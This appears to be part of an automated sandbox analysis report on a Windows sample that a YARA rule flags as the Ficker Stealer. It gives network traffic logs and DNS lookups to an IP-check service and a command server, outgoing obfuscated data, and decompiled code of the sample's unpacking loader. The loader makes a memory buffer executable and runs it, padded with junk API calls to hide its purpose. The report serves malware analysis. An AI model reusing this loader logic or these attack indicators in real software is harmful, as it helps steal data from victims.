                Apr 26, 2021 13:12:20.542356014 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542435884 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542715073 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542783976 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542834044 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542951107 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.543143034 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.543237925 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.544584990 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.544924021 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.545036077 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.545631886 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.545922995 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.546057940 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.546211958 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.546304941 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.546981096 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547091007 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547285080 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547373056 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547482014 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547641039 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547774076 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547909975 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547960043 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.548022032 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.548082113 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.548257113 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.679255009 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679281950 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679461956 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.679657936 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679718971 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679939985 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.681580067 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.681603909 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.682492018 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683063984 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683084011 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683334112 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683379889 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683489084 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683692932 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683801889 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683988094 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.684262991 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684278965 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684407949 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.684679031 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684847116 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.685018063 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.685120106 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.685440063 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.685525894 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.816633940 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.816668987 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.816883087 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.819199085 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.819730043 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.819991112 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820013046 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820115089 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.820544004 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820672035 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.821324110 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.821347952 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.821422100 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.821741104 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.822145939 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.953843117 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.955243111 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.956718922 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.956749916 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957006931 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957315922 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957956076 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957972050 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.958022118 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:21.251044035 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:21.253206968 CEST4971480192.168.2.635.203.73.169

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 26, 2021 13:12:01.687319994 CEST53492838.8.8.8192.168.2.6
                Apr 26, 2021 13:12:01.692984104 CEST53577258.8.8.8192.168.2.6
                Apr 26, 2021 13:12:02.572459936 CEST5837753192.168.2.68.8.8.8
                Apr 26, 2021 13:12:02.622209072 CEST53583778.8.8.8192.168.2.6
                Apr 26, 2021 13:12:03.572985888 CEST5507453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:03.630127907 CEST53550748.8.8.8192.168.2.6
                Apr 26, 2021 13:12:04.050932884 CEST5451353192.168.2.68.8.8.8
                Apr 26, 2021 13:12:04.113187075 CEST53545138.8.8.8192.168.2.6
                Apr 26, 2021 13:12:04.556898117 CEST6204453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:04.605921984 CEST53620448.8.8.8192.168.2.6
                Apr 26, 2021 13:12:05.370939016 CEST6379153192.168.2.68.8.8.8
                Apr 26, 2021 13:12:05.419739008 CEST53637918.8.8.8192.168.2.6
                Apr 26, 2021 13:12:06.573334932 CEST6426753192.168.2.68.8.8.8
                Apr 26, 2021 13:12:06.622031927 CEST53642678.8.8.8192.168.2.6
                Apr 26, 2021 13:12:07.690680981 CEST4944853192.168.2.68.8.8.8
                Apr 26, 2021 13:12:07.751699924 CEST53494488.8.8.8192.168.2.6
                Apr 26, 2021 13:12:08.464369059 CEST6034253192.168.2.68.8.8.8
                Apr 26, 2021 13:12:08.553478956 CEST53603428.8.8.8192.168.2.6
                Apr 26, 2021 13:12:08.829133034 CEST6134653192.168.2.68.8.8.8
                Apr 26, 2021 13:12:08.879450083 CEST53613468.8.8.8192.168.2.6
                Apr 26, 2021 13:12:09.628602982 CEST5177453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:09.677598953 CEST53517748.8.8.8192.168.2.6
                Apr 26, 2021 13:12:10.868748903 CEST5602353192.168.2.68.8.8.8
                Apr 26, 2021 13:12:10.917448044 CEST53560238.8.8.8192.168.2.6
                Apr 26, 2021 13:12:12.212172031 CEST5838453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:12.263802052 CEST53583848.8.8.8192.168.2.6
                Apr 26, 2021 13:12:12.273508072 CEST6026153192.168.2.68.8.8.8
                Apr 26, 2021 13:12:12.325170994 CEST53602618.8.8.8192.168.2.6
                Apr 26, 2021 13:12:12.640269995 CEST5606153192.168.2.68.8.8.8
                Apr 26, 2021 13:12:13.010302067 CEST53560618.8.8.8192.168.2.6
                Apr 26, 2021 13:12:13.183335066 CEST5833653192.168.2.68.8.8.8
                Apr 26, 2021 13:12:13.232364893 CEST53583368.8.8.8192.168.2.6
                Apr 26, 2021 13:12:14.472654104 CEST5378153192.168.2.68.8.8.8
                Apr 26, 2021 13:12:14.521483898 CEST53537818.8.8.8192.168.2.6
                Apr 26, 2021 13:12:15.320389986 CEST5406453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:15.369589090 CEST53540648.8.8.8192.168.2.6
                Apr 26, 2021 13:12:16.144175053 CEST5281153192.168.2.68.8.8.8
                Apr 26, 2021 13:12:16.195710897 CEST53528118.8.8.8192.168.2.6
                Apr 26, 2021 13:12:17.446739912 CEST5529953192.168.2.68.8.8.8
                Apr 26, 2021 13:12:17.498229027 CEST53552998.8.8.8192.168.2.6
                Apr 26, 2021 13:12:18.290448904 CEST6374553192.168.2.68.8.8.8
                Apr 26, 2021 13:12:18.347882032 CEST53637458.8.8.8192.168.2.6
                Apr 26, 2021 13:12:19.106888056 CEST5005553192.168.2.68.8.8.8
                Apr 26, 2021 13:12:19.155539989 CEST53500558.8.8.8192.168.2.6
                Apr 26, 2021 13:12:19.203447104 CEST6137453192.168.2.68.8.8.8
                Apr 26, 2021 13:12:19.260727882 CEST53613748.8.8.8192.168.2.6
                Apr 26, 2021 13:12:19.966949940 CEST5033953192.168.2.68.8.8.8
                Apr 26, 2021 13:12:20.015983105 CEST53503398.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 26, 2021 13:12:12.212172031 CEST192.168.2.68.8.8.80x4a4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.640269995 CEST192.168.2.68.8.8.80x2fddStandard query (0)sodaandcoke.topA (IP address)IN (0x0001)
                Apr 26, 2021 13:12:19.203447104 CEST192.168.2.68.8.8.80x25beStandard query (0)sodaandcoke.topA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.155.255A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.48.44A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.83.248A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.144.221A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.96.218A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.157.230A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST8.8.8.8192.168.2.60x4a4No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:13.010302067 CEST8.8.8.8192.168.2.60x2fddNo error (0)sodaandcoke.top35.203.73.169A (IP address)IN (0x0001)
                Apr 26, 2021 13:12:19.260727882 CEST8.8.8.8192.168.2.60x25beNo error (0)sodaandcoke.top35.203.73.169A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • api.ipify.org

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.64971254.225.155.25580C:\Users\user\Desktop\8s7bEDfYhT.exe
                TimestampkBytes transferredDirectionData
                Apr 26, 2021 13:12:12.434504032 CEST1132OUTGET /?format=xml HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.ipify.org
                Connection: Keep-Alive
                Apr 26, 2021 13:12:12.625264883 CEST1137INHTTP/1.1 200 OK
                Server: Cowboy
                Connection: keep-alive
                Content-Type: text/plain
                Vary: Origin
                Date: Mon, 26 Apr 2021 11:12:12 GMT
                Content-Length: 10
                Via: 1.1 vegur
                Data Raw: 38 34 2e 31 37 2e 35 32 2e 33
                Data Ascii: 84.17.52.3


                Session IDSource IPSource PortDestination IPDestination PortProcess
                135.203.73.16980192.168.2.649714C:\Users\user\Desktop\8s7bEDfYhT.exe
                TimestampkBytes transferredDirectionData
                Apr 26, 2021 13:12:13.519902945 CEST1145INData Raw: 00 04 00 00 00 00
                Data Ascii:
                Apr 26, 2021 13:12:13.520112038 CEST1145OUTData Raw: 0c 00 0f 0a 0b 0a 0b 0a
                Data Ascii:
                Apr 26, 2021 13:12:13.520215988 CEST1145OUTData Raw: 00 00 00 16 09 0a 0a 0a 18 79 65 6e 6b
                Data Ascii: yenk
                Apr 26, 2021 13:12:13.520247936 CEST1145OUTData Raw: 6b 64 6e 69 65 61 6f 24 7e 65 7a 30 32 3a
                Data Ascii: kdnieao$~ez02:
                Apr 26, 2021 13:12:13.520301104 CEST1145OUTData Raw: 00 00 00 0e 0b 0a 0a 0a 00
                Data Ascii:
                Apr 26, 2021 13:12:13.520351887 CEST1145OUTData Raw: 32 3e 24 3b 3d 24 3f 38 24 39
                Data Ascii: 2>$;=$?8$9
                Apr 26, 2021 13:12:13.520704031 CEST1145OUTData Raw: 00 00 00 28 07 0a 0a 0a 2e 6e 3a 3c 6f 6e 3c 39 3f 27 3c 32 6c 3c
                Data Ascii: (.n:<on<9?'<2l<
                Apr 26, 2021 13:12:13.520751953 CEST1146OUTData Raw: 27 3e 6f 33 6b 27 33 3f 3f 69 27 3e 32 33 33 6c 3f 6c 3f 3d 68 33 6b
                Data Ascii: '>o3k'3??i'>233l?l?=h3k
                Apr 26, 2021 13:12:15.350039959 CEST1171OUTData Raw: 00 00 01 27 00 0a 0a 0a 35 49 30 56 5f 79 6f 78 79 56 6f 64 6d 63 64 6f 6f 78 56 4b 7a 7a 4e 6b 7e 6b 56 46 65 69 6b 66 56 4d 65 65 6d 66 6f 56 49 62 78 65 67 6f 56 5f 79 6f 78 2a 4e 6b 7e 6b 56 4e 6f 6c 6b 7f 66 7e 0a 0a 0a 0b 0a 0a 0a 01 24 6d
                Data Ascii: '5I0V_yoxyVodmcdooxVKzzNk~kVFeikfVMeemfoVIbxegoV_yox*Nk~kVNolkf~$meemfo$iegDCN%jo28:>7Rf@'i^3Rm2NNDiLIbo'd_MhrrOop2
                Apr 26, 2021 13:12:15.350083113 CEST1171OUTData Raw: 4e 58 5a 4d 70 6d 70 5f 6e 50 60 5a 3b 40 6e 44 38 53 63 44 62 6c 73 58 41 4c 53 6e 7c 4c 6b 69 5f 63 6d 7f 5a 4d 40 72 44 50 5b 72 44 70 59 63 44 5c 48 69 41 7b 7e 7b 3e 60 6b 3d 6d 68 68 7c 59 39 7b 5b 4f 72 7c 78 69 4b 5e 42 32 59 73 4e 32 6e
                Data Ascii: NXZMpmp_nP`Z;@nD8ScDblsXALSn|Lki_cmZM@rDP[rDpYcD\HiA{~{>`k=mhh|Y9{[Or|xiK^B2YsN2nls=CbCRb<?|}s3}|piSMH2GZX8i2BBMAO]Nhi3NipZ>{S>Mmi=N2PLiPlOi
                Apr 26, 2021 13:12:15.404056072 CEST1172OUTData Raw: 00 00 01 39 00 0a 0a 0a 5b 49 30 56 5f 79 6f 78 79 56 6f 64 6d 63 64 6f 6f 78 56 46 65 69 6b 66 2a 59 6f 7e 7e 63 64 6d 79 56 4b 7a 7a 66 63 69 6b 7e 63 65 64 2a 4e 6b 7e 6b 56 4d 65 65 6d 66 6f 56 49 62 78 65 67 6f 56 5f 79 6f 78 2a 4e 6b 7e 6b
                Data Ascii: 9[I0V_yoxyVodmcdooxVFeikf*Yo~~cdmyVKzzfcik~ced*Nk~kVMeemfoVIbxegoV_yox*Nk~kVNolkf~$meemfo$iegDCN%jo28:>7Rf@'i^3Rm2NNDiLIbo'd


                Session IDSource IPSource PortDestination IPDestination PortProcess
                235.203.73.16980192.168.2.649722C:\Users\user\Desktop\8s7bEDfYhT.exe
                TimestampkBytes transferredDirectionData
                Apr 26, 2021 13:12:19.769609928 CEST4162INData Raw: 00 04 00 00 00 00
                Data Ascii:
                Apr 26, 2021 13:12:19.770051003 CEST4162OUTData Raw: 0c 00 0f 0a 0b 0a 0b 0a
                Data Ascii:
                Apr 26, 2021 13:12:19.770122051 CEST4162OUTData Raw: 00 00 00 16 09 0a 0a 0a 18 79 65 6e 6b
                Data Ascii: yenk
                Apr 26, 2021 13:12:19.770195961 CEST4162OUTData Raw: 6b 64 6e 69 65 61 6f 24 7e 65 7a 30 32 3a
                Data Ascii: kdnieao$~ez02:
                Apr 26, 2021 13:12:19.770308971 CEST4162OUTData Raw: 00 00 00 0b 0a 0a 0a 0a
                Data Ascii:
                Apr 26, 2021 13:12:19.770359993 CEST4162OUTData Raw: 0d 7a 65 7a 7a 7f 79 62
                Data Ascii: zezzyb
                Apr 26, 2021 13:12:20.023586988 CEST4447INData Raw: 00 00 00 04 00 00 00 00
                Data Ascii:


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:13:12:10
                Start date:26/04/2021
                Path:C:\Users\user\Desktop\8s7bEDfYhT.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\8s7bEDfYhT.exe'
                Imagebase:0x400000
                File size:381966 bytes
                MD5 hash:E0F6D15001D810320BBE9614C9365CA6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:13:12:11
                Start date:26/04/2021
                Path:C:\Users\user\Desktop\8s7bEDfYhT.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\8s7bEDfYhT.exe'
                Imagebase:0x400000
                File size:381966 bytes
                MD5 hash:E0F6D15001D810320BBE9614C9365CA6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  C-Code - Quality: 87%
                  			E0044CFD0() {
                  				signed int _v8;
                  				char _v2052;
                  				char _v2056;
                  				char _v2228;
                  				short _v2230;
                  				void _v2232;
                  				long _v2236;
                  				short _v2238;
                  				intOrPtr _v2242;
                  				struct _FILETIME _v2244;
                  				intOrPtr _v2246;
                  				intOrPtr _v2250;
                  				char _v2252;
                  				short _v2254;
                  				intOrPtr _v2258;
                  				intOrPtr _v2262;
                  				intOrPtr _v2266;
                  				char _v2268;
                  				void* _v2272;
                  				void* _v2276;
                  				void* _v2280;
                  				char _v2292;
                  				long _v2296;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t48;
                  				void* _t50;
                  				void* _t51;
                  				long _t57;
                  				int _t66;
                  				void* _t106;
                  				void* _t107;
                  				void* _t110;
                  				long _t118;
                  				long _t135;
                  				void* _t136;
                  				void* _t137;
                  				void* _t138;
                  				void* _t142;
                  				signed int _t143;
                  				void* _t144;
                  				void* _t150;
                  
                  				_t48 =  *0x44f0d4; // 0x45b66027
                  				_v8 = _t48 ^ _t143;
                  				if( *0x477a9c == 0x7c) {
                  					GetCompressedFileSizeA(0,  &_v2296);
                  					OpenWaitableTimerW(0, 0, 0);
                  					__imp__GetConsoleAliasW( &_v2056, 0, 0, 0);
                  					SetFileTime(0, 0, 0, 0);
                  					GlobalFindAtomW(0);
                  					_v2232 = 0;
                  					DisconnectNamedPipe( &_v2232);
                  					FindAtomW(0);
                  					GlobalUnlock(0);
                  					if( *0x477a9c == 0x11) {
                  						__imp__GetModuleHandleExW(0, 0,  &(_v2244.dwHighDateTime));
                  					}
                  					if( *0x477a9c == 0x54) {
                  						GetCurrentProcess();
                  						FileTimeToSystemTime( &_v2244, 0);
                  					}
                  					E00402581(0, "zitomuridapelagajepegolik pegehegovamasetotid %s %d %f");
                  					_t144 = _t144 + 8;
                  				}
                  				_t156 =  *0x477a9c - 0x110a;
                  				if( *0x477a9c == 0x110a) {
                  					 *0x46f980 = 0;
                  					 *0x46f984 = 0;
                  					SetTimeZoneInformation(0);
                  					SetTapeParameters(0, 0, 0);
                  					GlobalWire(0);
                  					_v2268 = 0;
                  					_v2266 = 0;
                  					_v2262 = 0;
                  					_v2258 = 0;
                  					_v2254 = 0;
                  					_v2252 = 0;
                  					_v2250 = 0;
                  					_v2246 = 0;
                  					_v2242 = 0;
                  					_v2238 = 0;
                  					__imp__TzSpecificLocalTimeToSystemTime( &_v2268,  &_v2252);
                  					SetWaitableTimer(0, 0, 0, 0, 0, 0);
                  					E0040242D( &_v2252, _t156, 0, 0);
                  					E0040242D( &_v2252, _t156, 0, 0);
                  					E00402B6B("0.txt", "rb");
                  					E004012E0( &_v2292);
                  					E00402581("0 %s %d %f",  &_v2228);
                  					_v2056 = 0x30;
                  					E0040A540(_t134,  &_v2052, 0, 0x7fc);
                  					E00402856(_t156, 0x46f998, 0x8102,  &_v2056, 0,  &_v8);
                  					E0040242D( &_v2056, _t156, 0, 0);
                  					E0040271E(_t156, 0);
                  					E00402134(0);
                  					_t89 = _v2280;
                  					_t150 = _t144 + 0x4c;
                  					_t157 = _v2280;
                  					if(_v2280 != 0) {
                  						_t134 = _v2276;
                  						_push(_v2244.dwHighDateTime);
                  						E00401DD0(_t89, _v2276);
                  						E00402BD5(_t106, _v2276, 0, _t157, _v2280);
                  						_t150 = _t150 + 8;
                  					}
                  					_v2280 = 0;
                  					_v2276 = 0;
                  					_v2272 = 0;
                  					E00402BD5(_t106, _t134, 0, _t157, _v2292);
                  				}
                  				_t50 = LocalAlloc(0,  *0x477a9c); // executed
                  				 *0x46f394 = _t50;
                  				_t51 = 0;
                  				if( *0x477a9c > 0) {
                  					do {
                  						 *((char*)( *0x46f394 + _t51)) =  *((intOrPtr*)( *0x477aa0 + _t51 + 0x15));
                  						_t118 =  *0x477a9c;
                  						if(_t118 == 0x203) {
                  							 *0x46f398 = 0x1974;
                  						}
                  						_t51 = _t51 + 1;
                  					} while (_t51 < _t118);
                  				}
                  				_v2232 = 0x20;
                  				_v2232 = _v2232 + 0x20;
                  				lstrcatW(0x46f998, L"kernel32.dll");
                  				 *0x46f380 = GetProcAddress(GetModuleHandleW(0x46f998), "VirtualProtect");
                  				VirtualProtect( *0x46f394,  *0x477a9c, 0x40,  &_v2236); // executed
                  				_t57 =  *0x477a9c;
                  				_t107 =  *0x46f394;
                  				_t135 = _t57;
                  				if(_t57 == 0x5dd) {
                  					SetSystemTimeAdjustment(0, 0);
                  					_t57 =  *0x477a9c;
                  				}
                  				_t127 =  *0x450100; // 0xdd409db6
                  				 *0x46f384 = _t127;
                  				if(_t57 == 0x114e) {
                  					GetFileAttributesW(0);
                  					_t57 =  *0x477a9c;
                  				}
                  				if(_t57 == 0xa57) {
                  					TerminateProcess(0, 0);
                  				}
                  				E0044CEC0(_t107, _t135);
                  				if( *0x477a9c == 0x568) {
                  					SizeofResource(0, 0);
                  				}
                  				_t136 = 0;
                  				do {
                  					if(_t136 == 0xbd9cb) {
                  						 *0x46f394 =  *0x46f394;
                  					}
                  					if( *0x477a9c == 0x6ce) {
                  						InterlockedIncrement( &(_v2244.dwHighDateTime));
                  					}
                  					_t136 = _t136 + 1;
                  				} while (_t136 < 0x15a63d);
                  				_t137 = 0;
                  				do {
                  					if(_t137 == 0x12e91b) {
                  						 *0x46f394();
                  					}
                  					 *0x46f988 = 0x8e55e61a;
                  					if( *0x477a9c == 0x58) {
                  						SetFileAttributesA(0, 0);
                  						_t127 = 0;
                  						_v2232 = 0;
                  						_v2230 = 0;
                  						WriteConsoleOutputCharacterW(0, 0, 0, _v2232,  &(_v2244.dwHighDateTime));
                  						OpenWaitableTimerW(0, 0, 0);
                  					}
                  					_t137 = _t137 + 1;
                  				} while (_t137 < 0x6f479f);
                  				_t142 = GetAtomNameA;
                  				_t110 = SetConsoleScreenBufferSize;
                  				_t138 = 0;
                  				while(1) {
                  					_t66 = GetAtomNameA(0, 0, 0);
                  					if( *0x477a9c == 0x26e) {
                  						_t127 = _v2244.dwHighDateTime;
                  						_t66 = SetConsoleScreenBufferSize(0, _v2244.dwHighDateTime);
                  					}
                  					if(_t138 > 0x1ac2b) {
                  						break;
                  					}
                  					_t138 = _t138 + 1;
                  					if(_t138 < 0x1ebc2dba) {
                  						continue;
                  					}
                  					break;
                  				}
                  				return E004020C8(_t66, _t110, _v8 ^ _t143, _t127, _t138, _t142);
                  			}















































                  0x0044cfd9
                  0x0044cfe0
                  0x0044cfef
                  0x0044cffd
                  0x0044d006
                  0x0044d016
                  0x0044d020
                  0x0044d027
                  0x0044d034
                  0x0044d03a
                  0x0044d041
                  0x0044d048
                  0x0044d055
                  0x0044d060
                  0x0044d060
                  0x0044d06d
                  0x0044d06f
                  0x0044d07d
                  0x0044d07d
                  0x0044d089
                  0x0044d08e
                  0x0044d08e
                  0x0044d091
                  0x0044d09b
                  0x0044d0a2
                  0x0044d0a8
                  0x0044d0ae
                  0x0044d0b7
                  0x0044d0be
                  0x0044d0ce
                  0x0044d0dc
                  0x0044d0e2
                  0x0044d0e8
                  0x0044d0ee
                  0x0044d0f5
                  0x0044d0fc
                  0x0044d102
                  0x0044d108
                  0x0044d10e
                  0x0044d11d
                  0x0044d129
                  0x0044d131
                  0x0044d138
                  0x0044d147
                  0x0044d156
                  0x0044d160
                  0x0044d175
                  0x0044d17f
                  0x0044d19d
                  0x0044d1a7
                  0x0044d1ad
                  0x0044d1b6
                  0x0044d1bb
                  0x0044d1c1
                  0x0044d1c4
                  0x0044d1c6
                  0x0044d1ce
                  0x0044d1d4
                  0x0044d1d5
                  0x0044d1e4
                  0x0044d1e9
                  0x0044d1e9
                  0x0044d1f3
                  0x0044d1f9
                  0x0044d1ff
                  0x0044d205
                  0x0044d20a
                  0x0044d215
                  0x0044d21b
                  0x0044d220
                  0x0044d228
                  0x0044d22f
                  0x0044d23f
                  0x0044d242
                  0x0044d24e
                  0x0044d250
                  0x0044d250
                  0x0044d256
                  0x0044d257
                  0x0044d22f
                  0x0044d25b
                  0x0044d265
                  0x0044d276
                  0x0044d2a0
                  0x0044d2ae
                  0x0044d2b4
                  0x0044d2b9
                  0x0044d2bf
                  0x0044d2c6
                  0x0044d2ca
                  0x0044d2d0
                  0x0044d2d0
                  0x0044d2d5
                  0x0044d2db
                  0x0044d2e6
                  0x0044d2e9
                  0x0044d2ef
                  0x0044d2ef
                  0x0044d2f9
                  0x0044d2fd
                  0x0044d2fd
                  0x0044d303
                  0x0044d312
                  0x0044d316
                  0x0044d316
                  0x0044d322
                  0x0044d324
                  0x0044d32a
                  0x0044d32c
                  0x0044d32c
                  0x0044d340
                  0x0044d349
                  0x0044d349
                  0x0044d34b
                  0x0044d34c
                  0x0044d360
                  0x0044d362
                  0x0044d368
                  0x0044d36a
                  0x0044d36a
                  0x0044d377
                  0x0044d381
                  0x0044d387
                  0x0044d389
                  0x0044d394
                  0x0044d39b
                  0x0044d3ac
                  0x0044d3b4
                  0x0044d3b4
                  0x0044d3ba
                  0x0044d3bb
                  0x0044d3c3
                  0x0044d3c9
                  0x0044d3cf
                  0x0044d3d1
                  0x0044d3d7
                  0x0044d3e3
                  0x0044d3e5
                  0x0044d3ee
                  0x0044d3ee
                  0x0044d3f6
                  0x00000000
                  0x00000000
                  0x0044d3f8
                  0x0044d3ff
                  0x00000000
                  0x00000000
                  0x00000000
